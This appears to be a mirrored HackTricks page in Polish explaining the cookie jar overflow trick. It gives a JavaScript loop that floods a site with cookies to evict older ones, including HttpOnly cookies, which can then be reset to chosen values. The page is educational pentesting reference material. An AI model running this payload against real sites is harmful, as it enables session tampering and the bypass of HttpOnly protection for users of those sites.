mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
23 lines
1.0 KiB
Markdown
23 lines
1.0 KiB
Markdown
{{#include ../../banners/hacktricks-training.md}}
|
|
|
|
Przeglądarki mają **limit liczby ciasteczek**, które mogą przechowywać dla danej strony. Jeśli z jakiegoś powodu musisz **sprawić, aby ciasteczko zniknęło**, możesz **przepełnić słoik z ciasteczkami**, ponieważ najstarsze zostaną usunięte przed:
|
|
```javascript
|
|
// Set many cookies
|
|
for (let i = 0; i < 700; i++) {
|
|
document.cookie = `cookie${i}=${i}; Secure`
|
|
}
|
|
|
|
// Remove all cookies
|
|
for (let i = 0; i < 700; i++) {
|
|
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
|
|
}
|
|
```
|
|
Zauważ, że pliki cookie stron trzecich wskazujące na inna domenę nie będą nadpisywane.
|
|
|
|
> [!OSTRZEŻENIE]
|
|
> Ta atak może być również użyty do **nadpisania plików cookie HttpOnly, ponieważ możesz je usunąć, a następnie zresetować z wartością, którą chcesz**.
|
|
>
|
|
> Sprawdź to w [**tym poście z laboratorium**](https://www.sjoerdlangkemper.nl/2020/05/27/overwriting-httponly-cookies-from-javascript-using-cookie-jar-overflow/).
|
|
|
|
{{#include ../../banners/hacktricks-training.md}}
|